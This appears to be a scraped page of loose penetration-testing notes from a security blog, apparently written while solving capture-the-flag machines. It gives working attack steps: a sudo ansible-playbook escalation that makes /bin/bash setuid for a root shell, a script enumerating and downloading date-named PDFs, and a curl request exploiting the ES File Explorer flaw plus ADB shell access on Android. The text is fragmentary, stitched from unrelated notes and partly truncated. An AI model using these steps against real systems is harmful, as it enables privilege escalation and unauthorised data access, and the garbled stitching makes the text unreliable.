Steinz Security

    Abusing ansible-playbook run.yml file #consider ansible-playbook is running as a cron jon /usr/bin/ansible-playbook /opt/backups/playbook/run.yml   Abusing (ALL) NOPASSWD: /usr/bin/ansible-playbook * Create a new get_root.yml file - hosts: localhost tasks: - name: test command: "chmod +s /bin/bash" udo ansible-playbook get_root.yml /bin/bash -p

    here we are looking for files whose names are in the form of 2020-01-01-upload.pdf below script was taken from github Python Script to Create and acess Filenames in the form of Date #!/usr/bin/python3 import requests import os url = 'http://10.10.10.10/documents/' for i in range ( 2020 , 2022 ): for j in range ( 1 , 13 ): for k in range ( 1 , 31 ):                               #File name date = f' { i } - { j :02 } - { k :02 } -upload.pdf' r = requests . get ( url + date ) #print (r.text) if ( r . status_code == 200 ): print ( date ) #text = r.text os . system ( 'mkdir pdf' ) os . system ( f'wget { url } { date } -O pdf/ { date } ' ) Using Exif to find the Author of the files #!/usr/bin/python3 from pwn import * io = process ( '/bin/sh' ) io . sendline ( 'ls -al pdf/' ) lst = io . recvrepeat ( 1 ). decode (). strip (). split ( ' \n ' ) files

    git clone https://github.com/yonjar/fixgz.git cd fizgz g++ fixgz.cpp -o fixgz ./fixgz /fixgz db.gz db_fixed.gz  

  If you want to change the user owning this file or directory (folder), you will have to use the command   chown . For instance, if you run sudo chown username: myfolder the user owning myfolder will be username. Then you can execute sudo chmod u+w myfolder to add the write permission to the username user. But if you want to add this user to the group associated with "myfolder", you can run sudo usermod -a -G groupname username and then execute sudo chmod g+w myfolder to add the write permission to the group.

Port Scan on Android as many random ports can be open on Android devices, its always better to scan all the ports using   https://github.com/RustScan/RustScan/releases download the debian package dpkg -i filename rustscan -a 10.10.10.247 now scan all the open ports with nmap -sC -sV to run default script and for version scan. Installing ADB sudo apt-get install android-tools-adb Abusing ES File Explorer Vuln Exploiting can be downloaded from here or can use curl to abuse it curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777 ADB Commands ADB Cheatsheet is here #Port forward a port from the Android device to ADB sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local #Connect to a device over wireless adb tcpip 9090 #connect to the service adb connect 127.0.0.1:5555 #list connected devices adb devices #get a shell from a selected device #adb -s device_name shell adb -s 127.

  In the log, it’s the last lines in /tmp/win kexsl_user.log: winMultiWindowXMsgProc - Fatal error 1 on xcb connection winClipboardIOErrorHandler! winClipboardProc - setjmp returned for IO Error Handler. (II) Server terminated successfully (0). Closing log file. here you can try to start Win-KeX with sudo: sudo kex --sl --wtstart -s A solution also brought the deletion of the logs under /tmp. sudo rm -f /tmp/*.log And stop the KeX server with the –stop and –kill option. sudo kex --stop sudo kex --kill After that, the start of kex as a normal user became possible. kex --sl --wtstart -s Also, a Win-KeX reinstallation can fix the error: sudo kex --stop sudo kex --kill sudo apt-get purge kali-win-kex sudo apt-get install kali-win-kex sudo apt-get install dbus-x11